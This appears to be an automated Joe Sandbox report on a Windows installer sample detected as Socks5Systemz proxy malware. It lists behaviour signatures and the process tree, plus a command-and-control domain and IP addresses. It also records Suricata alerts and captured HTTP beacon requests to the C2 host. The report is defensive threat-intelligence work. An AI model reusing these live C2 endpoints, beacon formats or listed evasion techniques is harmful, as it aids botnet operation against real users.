Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520633
MD5:5f3d49bffed0da5d969582bd92fed715
SHA1:6efbd680de90af1c2ac13eb1a781b3797f6714e4
SHA256:a166a398a327a98b73d33c3ffd0ae68ae1538a79678e4e16c5977aadfa46a395
Tags:exeuser-Bitsight
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
PE file has a writeable .text section
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5F3D49BFFED0DA5D969582BD92FED715)
    • file.tmp (PID: 6312 cmdline: "C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp" /SL5="$20434,3031792,56832,C:\Users\user\Desktop\file.exe" MD5: 499BD324F6DD0DF600B61BE36E26B612)
      • gerdaplay3se.exe (PID: 4052 cmdline: "C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe" -i MD5: D9BDC42F41BCE78D0C9D0FB3AC33D0DF)
  • cleanup
{"C2 list": ["ceyqbgr.net"]}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000003.00000002.3371905613.0000000002721000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: gerdaplay3se.exe PID: 4052JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-27T17:31:53.456689+020020494671A Network Trojan was detected192.168.2.657519185.208.158.24880TCP
        2024-09-27T17:31:56.349470+020020494671A Network Trojan was detected192.168.2.657519185.208.158.24880TCP
        2024-09-27T17:31:56.885180+020020494671A Network Trojan was detected192.168.2.657519185.208.158.24880TCP
        2024-09-27T17:31:58.025467+020020494671A Network Trojan was detected192.168.2.657522185.208.158.24880TCP
        2024-09-27T17:31:59.024528+020020494671A Network Trojan was detected192.168.2.657523185.208.158.24880TCP
        2024-09-27T17:31:59.852769+020020494671A Network Trojan was detected192.168.2.657524185.208.158.24880TCP
        2024-09-27T17:32:00.689985+020020494671A Network Trojan was detected192.168.2.657526185.208.158.24880TCP
        2024-09-27T17:32:01.039539+020020494671A Network Trojan was detected192.168.2.657526185.208.158.24880TCP
        2024-09-27T17:32:01.393119+020020494671A Network Trojan was detected192.168.2.657526185.208.158.24880TCP
        2024-09-27T17:32:01.913473+020020494671A Network Trojan was detected192.168.2.657526185.208.158.24880TCP
        2024-09-27T17:32:02.267509+020020494671A Network Trojan was detected192.168.2.657526185.208.158.24880TCP
        2024-09-27T17:32:03.067039+020020494671A Network Trojan was detected192.168.2.657527185.208.158.24880TCP
        2024-09-27T17:32:03.418240+020020494671A Network Trojan was detected192.168.2.657527185.208.158.24880TCP
        2024-09-27T17:32:04.272954+020020494671A Network Trojan was detected192.168.2.657528185.208.158.24880TCP
        2024-09-27T17:32:05.215372+020020494671A Network Trojan was detected192.168.2.657529185.208.158.24880TCP
        2024-09-27T17:32:06.018644+020020494671A Network Trojan was detected192.168.2.657530185.208.158.24880TCP
        2024-09-27T17:32:06.373694+020020494671A Network Trojan was detected192.168.2.657530185.208.158.24880TCP
        2024-09-27T17:32:07.205985+020020494671A Network Trojan was detected192.168.2.657531185.208.158.24880TCP
        2024-09-27T17:32:08.108983+020020494671A Network Trojan was detected192.168.2.657532185.208.158.24880TCP
        2024-09-27T17:32:08.923277+020020494671A Network Trojan was detected192.168.2.657533185.208.158.24880TCP
        2024-09-27T17:32:09.753087+020020494671A Network Trojan was detected192.168.2.657534185.208.158.24880TCP
        2024-09-27T17:32:10.885803+020020494671A Network Trojan was detected192.168.2.657535185.208.158.24880TCP
        2024-09-27T17:32:11.795330+020020494671A Network Trojan was detected192.168.2.657536185.208.158.24880TCP
        2024-09-27T17:32:12.695074+020020494671A Network Trojan was detected192.168.2.657537185.208.158.24880TCP
        2024-09-27T17:32:13.253377+020020494671A Network Trojan was detected192.168.2.657537185.208.158.24880TCP
        2024-09-27T17:32:14.187113+020020494671A Network Trojan was detected192.168.2.657538185.208.158.24880TCP
        2024-09-27T17:32:15.019151+020020494671A Network Trojan was detected192.168.2.657539185.208.158.24880TCP
        2024-09-27T17:32:15.855427+020020494671A Network Trojan was detected192.168.2.657540185.208.158.24880TCP
        2024-09-27T17:32:16.706911+020020494671A Network Trojan was detected192.168.2.657541185.208.158.24880TCP
        2024-09-27T17:32:17.056712+020020494671A Network Trojan was detected192.168.2.657541185.208.158.24880TCP
        2024-09-27T17:32:17.927819+020020494671A Network Trojan was detected192.168.2.657543185.208.158.24880TCP
        2024-09-27T17:32:18.382123+020020494671A Network Trojan was detected192.168.2.657543185.208.158.24880TCP
        2024-09-27T17:32:18.733642+020020494671A Network Trojan was detected192.168.2.657543185.208.158.24880TCP
        2024-09-27T17:32:19.582795+020020494671A Network Trojan was detected192.168.2.657544185.208.158.24880TCP
        2024-09-27T17:32:19.931095+020020494671A Network Trojan was detected192.168.2.657544185.208.158.24880TCP
        2024-09-27T17:32:20.791335+020020494671A Network Trojan was detected192.168.2.657545185.208.158.24880TCP
        2024-09-27T17:32:21.648710+020020494671A Network Trojan was detected192.168.2.657547185.208.158.24880TCP
        2024-09-27T17:32:22.019903+020020494671A Network Trojan was detected192.168.2.657547185.208.158.24880TCP
        2024-09-27T17:32:22.948397+020020494671A Network Trojan was detected192.168.2.657548185.208.158.24880TCP
        2024-09-27T17:32:23.788572+020020494671A Network Trojan was detected192.168.2.657549185.208.158.24880TCP
        2024-09-27T17:32:24.221834+020020494671A Network Trojan was detected192.168.2.657549185.208.158.24880TCP
        2024-09-27T17:32:24.572523+020020494671A Network Trojan was detected192.168.2.657549185.208.158.24880TCP
        2024-09-27T17:32:25.416569+020020494671A Network Trojan was detected192.168.2.657550185.208.158.24880TCP
        2024-09-27T17:32:26.238460+020020494671A Network Trojan was detected192.168.2.657551185.208.158.24880TCP
        2024-09-27T17:32:26.620409+020020494671A Network Trojan was detected192.168.2.657551185.208.158.24880TCP
        2024-09-27T17:32:27.662406+020020494671A Network Trojan was detected192.168.2.657552185.208.158.24880TCP
        2024-09-27T17:32:28.011305+020020494671A Network Trojan was detected192.168.2.657552185.208.158.24880TCP
        2024-09-27T17:32:28.894011+020020494671A Network Trojan was detected192.168.2.657553185.208.158.24880TCP
        2024-09-27T17:32:29.250014+020020494671A Network Trojan was detected192.168.2.657553185.208.158.24880TCP
        2024-09-27T17:32:30.081909+020020494671A Network Trojan was detected192.168.2.657554185.208.158.24880TCP
        2024-09-27T17:32:30.439564+020020494671A Network Trojan was detected192.168.2.657554185.208.158.24880TCP
        2024-09-27T17:32:31.293799+020020494671A Network Trojan was detected192.168.2.657555185.208.158.24880TCP
        2024-09-27T17:32:32.209370+020020494671A Network Trojan was detected192.168.2.657556185.208.158.24880TCP
        2024-09-27T17:32:32.559173+020020494671A Network Trojan was detected192.168.2.657556185.208.158.24880TCP
        2024-09-27T17:32:33.392448+020020494671A Network Trojan was detected192.168.2.657557185.208.158.24880TCP
        2024-09-27T17:32:34.215126+020020494671A Network Trojan was detected192.168.2.657558185.208.158.24880TCP
        2024-09-27T17:32:35.049986+020020494671A Network Trojan was detected192.168.2.657559185.208.158.24880TCP
        2024-09-27T17:32:35.411257+020020494671A Network Trojan was detected192.168.2.657559185.208.158.24880TCP
        2024-09-27T17:32:35.763988+020020494671A Network Trojan was detected192.168.2.657559185.208.158.24880TCP
        2024-09-27T17:32:36.594047+020020494671A Network Trojan was detected192.168.2.657560185.208.158.24880TCP
        2024-09-27T17:32:37.422418+020020494671A Network Trojan was detected192.168.2.657561185.208.158.24880TCP
        2024-09-27T17:32:38.261246+020020494671A Network Trojan was detected192.168.2.657562185.208.158.24880TCP
        2024-09-27T17:32:39.289194+020020494671A Network Trojan was detected192.168.2.657563185.208.158.24880TCP
        2024-09-27T17:32:40.123339+020020494671A Network Trojan was detected192.168.2.657564185.208.158.24880TCP
        2024-09-27T17:32:40.924876+020020494671A Network Trojan was detected192.168.2.657565185.208.158.24880TCP
        2024-09-27T17:32:41.880651+020020494671A Network Trojan was detected192.168.2.657566185.208.158.24880TCP
        2024-09-27T17:32:42.250934+020020494671A Network Trojan was detected192.168.2.657566185.208.158.24880TCP
        2024-09-27T17:32:43.068978+020020494671A Network Trojan was detected192.168.2.657567185.208.158.24880TCP
        2024-09-27T17:32:43.421271+020020494671A Network Trojan was detected192.168.2.657567185.208.158.24880TCP
        2024-09-27T17:32:47.253485+020020494671A Network Trojan was detected192.168.2.657568185.208.158.24880TCP
        2024-09-27T17:32:47.601827+020020494671A Network Trojan was detected192.168.2.657568185.208.158.24880TCP
        2024-09-27T17:32:47.946316+020020494671A Network Trojan was detected192.168.2.657568185.208.158.24880TCP
        2024-09-27T17:32:48.796979+020020494671A Network Trojan was detected192.168.2.657570185.208.158.24880TCP
        2024-09-27T17:32:49.614077+020020494671A Network Trojan was detected192.168.2.657571185.208.158.24880TCP
        2024-09-27T17:32:49.962516+020020494671A Network Trojan was detected192.168.2.657571185.208.158.24880TCP
        2024-09-27T17:32:50.807144+020020494671A Network Trojan was detected192.168.2.657572185.208.158.24880TCP
        2024-09-27T17:32:51.669495+020020494671A Network Trojan was detected192.168.2.657573185.208.158.24880TCP
        2024-09-27T17:32:52.719678+020020494671A Network Trojan was detected192.168.2.657574185.208.158.24880TCP
        2024-09-27T17:32:53.621360+020020494671A Network Trojan was detected192.168.2.657575185.208.158.24880TCP
        2024-09-27T17:32:54.453355+020020494671A Network Trojan was detected192.168.2.657576185.208.158.24880TCP
        2024-09-27T17:32:55.380008+020020494671A Network Trojan was detected192.168.2.657577185.208.158.24880TCP
        2024-09-27T17:32:56.275356+020020494671A Network Trojan was detected192.168.2.657578185.208.158.24880TCP
        2024-09-27T17:32:57.202034+020020494671A Network Trojan was detected192.168.2.657579185.208.158.24880TCP
        2024-09-27T17:32:58.046291+020020494671A Network Trojan was detected192.168.2.657580185.208.158.24880TCP
        2024-09-27T17:32:58.953477+020020494671A Network Trojan was detected192.168.2.657581185.208.158.24880TCP
        2024-09-27T17:32:59.949927+020020494671A Network Trojan was detected192.168.2.657582185.208.158.24880TCP
        2024-09-27T17:33:00.772029+020020494671A Network Trojan was detected192.168.2.657583185.208.158.24880TCP
        2024-09-27T17:33:01.633142+020020494671A Network Trojan was detected192.168.2.657584185.208.158.24880TCP
        2024-09-27T17:33:02.493932+020020494671A Network Trojan was detected192.168.2.657585185.208.158.24880TCP
        2024-09-27T17:33:03.387368+020020494671A Network Trojan was detected192.168.2.657586185.208.158.24880TCP
        2024-09-27T17:33:04.249909+020020494671A Network Trojan was detected192.168.2.657587185.208.158.24880TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: gerdaplay3se.exe.4052.3.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["ceyqbgr.net"]}
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045D230 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D230
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045D2E4 ArcFourCrypt,1_2_0045D2E4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045D2FC ArcFourCrypt,1_2_0045D2FC
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

        Compliance

        barindex
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeUnpacked PE file: 3.2.gerdaplay3se.exe.400000.0.unpack
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: Binary string: msvcp71.pdbx# source: is-RDVP8.tmp.1.dr
        Source: Binary string: msvcr71.pdb< source: is-8SV2U.tmp.1.dr
        Source: Binary string: F:\Temp\openssl-1.1.1t\libssl-1_1.pdb source: is-UG21C.tmp.1.dr
        Source: Binary string: msvcp71.pdb source: is-RDVP8.tmp.1.dr
        Source: Binary string: msvcr71.pdb source: is-8SV2U.tmp.1.dr
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00452AD4 FindFirstFileA,GetLastError,1_2_00452AD4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004753C4 FindFirstFileA,FindNextFileA,FindClose,1_2_004753C4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00464200 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464200
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0049877C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_0049877C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004627F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004627F8
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00463D84 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463D84

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57522 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57523 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57519 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57526 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57528 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57524 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57580 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57548 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57529 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57550 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57573 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57555 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57583 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57531 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57557 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57543 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57553 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57537 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57565 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57554 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57577 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57574 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57567 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57559 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57533 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57581 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57575 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57564 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57527 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57584 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57582 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57536 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57530 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57538 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57535 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57534 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57541 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57532 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57576 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57551 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57560 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57540 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57544 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57587 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57556 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57562 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57561 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57539 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57552 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57563 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57578 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57566 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57571 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57545 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57547 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57558 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57585 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57549 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57570 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57572 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57586 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57568 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57579 -> 185.208.158.248:80
        Source: Malware configuration extractorURLs: ceyqbgr.net
        Source: global trafficTCP traffic: 192.168.2.6:57520 -> 89.105.201.183:2023
        Source: Joe Sandbox ViewIP Address: 185.208.158.248 185.208.158.248
        Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
        Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf815c5ee949b32 HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
